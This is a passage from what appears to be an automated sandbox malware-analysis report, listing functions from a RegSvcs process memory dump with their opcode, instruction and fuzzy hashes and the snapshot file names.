                                    • Opcode ID: ebd1454c07a1afc3c1859fe8ba23100cf3fb8e63b144ad380c1fee0cb3d27d4e
                                    • Instruction ID: 737a7a7465599d7f69aab89195ce4e26c5093075da7e0950320c695eaa74c02d
                                    • Opcode Fuzzy Hash: ebd1454c07a1afc3c1859fe8ba23100cf3fb8e63b144ad380c1fee0cb3d27d4e
                                    • Instruction Fuzzy Hash: B11115B58007498FDB20CF9AD845BDEBBF4EB48324F208459D519A7250D774A944CFA5
                                    Function 05B76F8C Relevance: .0, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1d4b4bd698f1128995455efbdce9ad6fef36de6b4c6d8ccc34fc49b724214ab
                                    • Instruction ID: 8923e3233971282526381f8bae277e7c1689e569e6cad9018bfd154cf17eb21a
                                    • Opcode Fuzzy Hash: b1d4b4bd698f1128995455efbdce9ad6fef36de6b4c6d8ccc34fc49b724214ab
                                    • Instruction Fuzzy Hash: 1B1112B58047498FDB20DF9AC484BDEBBF4EB48324F208459D529A7250C374A944CFA5
                                    Function 05B75F58 Relevance: .0, Instructions: 40COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1bdfa79d40b4b48060474dc3f87fd08ab07f293bd641801ca83a41e6c8c83ee0
                                    • Instruction ID: 472688f593f54259a78cc72515eded0555039724cb4e38bdcbf3d534651d9ce5
                                    • Opcode Fuzzy Hash: 1bdfa79d40b4b48060474dc3f87fd08ab07f293bd641801ca83a41e6c8c83ee0
                                    • Instruction Fuzzy Hash: 97F0F670E4454D9BC770DE7C5408479BFF9E349211F4445E7D43ADF684D630AA008B81
                                    Function 05B70B14 Relevance: .0, Instructions: 34COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c0ccec43997460a1ef6c52e5b3803dea5b963c4902c9dbf50181d9a3634da324
                                    • Instruction ID: b2913911a53ff284708607d2fbca2da6194788030528f104ca98758b8baf3bf0
                                    • Opcode Fuzzy Hash: c0ccec43997460a1ef6c52e5b3803dea5b963c4902c9dbf50181d9a3634da324
                                    • Instruction Fuzzy Hash: 8EF08C343802059FD364EF39E888F1677A6FB89720F258298F5219F7E4CA70EC418B50
                                    Function 05B75EE8 Relevance: .0, Instructions: 28COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c482327b3cdc756e79783251fa006b8fac10d8e4d47d63cb419af6eb55e1d44
                                    • Instruction ID: fd30cad8e4d053099f3756e2eddbe5f3c3fde7591c11247851dd2a42b98f5d01
                                    • Opcode Fuzzy Hash: 4c482327b3cdc756e79783251fa006b8fac10d8e4d47d63cb419af6eb55e1d44
                                    • Instruction Fuzzy Hash: ACE06833B5849893CB1485BD99087667ECF93C9220F5484EBE67ACB7CDDC20EC0083A5
                                    Function 05B79590 Relevance: .0, Instructions: 26COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27d2d54e1e1529dd92ae16386b732faefe72a2d47df625560c4b6e48bf458ee6
                                    • Instruction ID: 1a47a2bfcabe9e60c15446e3ab3125c998ea7c18d132772fb97b880439b1da02
                                    • Opcode Fuzzy Hash: 27d2d54e1e1529dd92ae16386b732faefe72a2d47df625560c4b6e48bf458ee6
                                    • Instruction Fuzzy Hash: 1EE0683120C3E44FD30585686A03112BB26AB86A1471980EBE909CF306D6138C2283D3
                                    Function 05B77499 Relevance: .0, Instructions: 25COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5c82a77aa1f26147ddea24f90bbf07ffa39b858af72e638a4ef748d00bac31bc
                                    • Instruction ID: 1bb6493613c624658a33be872d3bf66de617d6aff7c44ab5701de3ec376b2930
                                    • Opcode Fuzzy Hash: 5c82a77aa1f26147ddea24f90bbf07ffa39b858af72e638a4ef748d00bac31bc
                                    • Instruction Fuzzy Hash: FEE0E5327001168BC714BA34B46816AB757EBC8601BC54436D806CB688DE70A9478B81
                                    Function 05B75EF8 Relevance: .0, Instructions: 24COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31cff694396ee928f6c7481597b8a08db4af71a2e341dd79291425d03c83b164
                                    • Instruction ID: 7e237d1b1e44ebf4182bcd1fed7c5e8d025142ae105e9bc86e936c29e749b6c4
                                    • Opcode Fuzzy Hash: 31cff694396ee928f6c7481597b8a08db4af71a2e341dd79291425d03c83b164
                                    • Instruction Fuzzy Hash: E4E0CD3171481893D754557D6504556B5CF93C9661B5084A7E62ACBBCCCD70EC1043D9
                                    Function 05B795A0 Relevance: .0, Instructions: 20COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4b91f1dd026e5b79f52e8f30e2c3a95fbd283525041c20cf563a60e9a5bebf9
                                    • Instruction ID: d79580b967600bf4bae8c168efce53a338cae16a6c2d404c4cf79cb6816a155e
                                    • Opcode Fuzzy Hash: a4b91f1dd026e5b79f52e8f30e2c3a95fbd283525041c20cf563a60e9a5bebf9
                                    • Instruction Fuzzy Hash: C7D095323542BC47D344547D6A07167754FE7C5A50B4084A3E516CF304D951DD3043C6
                                    Function 05B77504 Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3b56cab2afb14b249bb076b7c5f68e893566042ccc3e11259c1cf53278eb306
                                    • Instruction ID: fd7d4dcfde9a7542d6f3d6d7c8c4c29436af5bf2cb71f52b10e6822ab1275c81
                                    • Opcode Fuzzy Hash: f3b56cab2afb14b249bb076b7c5f68e893566042ccc3e11259c1cf53278eb306
                                    • Instruction Fuzzy Hash: ABE086317001118B8368FA68746C0267357BBC92017954436C806CB78CEF70DD038781
                                    Function 05B70BB8 Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8db9c8e70d0ac5ec848712b0be6b184247761067144f6d2125377951f65b3ca4
                                    • Instruction ID: 210702f673a99c7d3f1a3203bc7618e9a5506d2f63b4024bfa72412921bb508d
                                    • Opcode Fuzzy Hash: 8db9c8e70d0ac5ec848712b0be6b184247761067144f6d2125377951f65b3ca4
                                    • Instruction Fuzzy Hash: A5E086B570014A8B8704DF7D816616EB597BBC4110300C93EC029DB340DBB4DD549FD1
                                    Function 05B756B5 Relevance: .0, Instructions: 16COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de1810610e7758922893d1f403b0c0fade298be7ad75f010ea4ab1c087a721ba
                                    • Instruction ID: 1ca5282e4fab736219d86bacfd0089898d74c58a8ce488393ea24d818431bc9f
                                    • Opcode Fuzzy Hash: de1810610e7758922893d1f403b0c0fade298be7ad75f010ea4ab1c087a721ba
                                    • Instruction Fuzzy Hash: 4CD0673AB40008DFCF049F99E8549DDF776FF98261B048556FA25E3260C6319921DB60
                                    Function 05B70DAC Relevance: .0, Instructions: 13COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c056099ba8cacbfe146b7013431126e11450b622bbd9bc5511d89952ccb55da
                                    • Instruction ID: 84bc8858545eaaa3c0d00a2ef60d732c40b31e7a8cf15fe092c1ddd7e52f68bc
                                    • Opcode Fuzzy Hash: 0c056099ba8cacbfe146b7013431126e11450b622bbd9bc5511d89952ccb55da
                                    • Instruction Fuzzy Hash: 10D01774A501508FC758EF38F51C819B7E1BB99A04394846AD806CB7A4DB74EE448B40
                                    Function 05B725B0 Relevance: .0, Instructions: 12COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f7965f2108c161210e25257c9c46886c30d2fb7505bd408f6c1aa8b3f79c81b
                                    • Instruction ID: a524941604da37e7335fc6323b60e9c9b06dcde44f2d3ca67ef45dfb4c49292d
                                    • Opcode Fuzzy Hash: 7f7965f2108c161210e25257c9c46886c30d2fb7505bd408f6c1aa8b3f79c81b
                                    • Instruction Fuzzy Hash: 4BC0127040020FCAD649EB7AF854955B77EEA80200740D518D7060A219DF78DCCA4694
                                    Function 05B78D2A Relevance: .0, Instructions: 12COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c10ed711d7bb5d35660a8fd09f892aced96e411c5de33df5ff14ef91be0fb75
                                    • Instruction ID: e312a03c54157728ad5c1580989577cfe239b8a4a8f6b493f6c5a845db865714
                                    • Opcode Fuzzy Hash: 2c10ed711d7bb5d35660a8fd09f892aced96e411c5de33df5ff14ef91be0fb75
                                    • Instruction Fuzzy Hash: FAC0802144D7C1BFC3035710FC1D4477F226E22246745418AF48056073C6515D27C371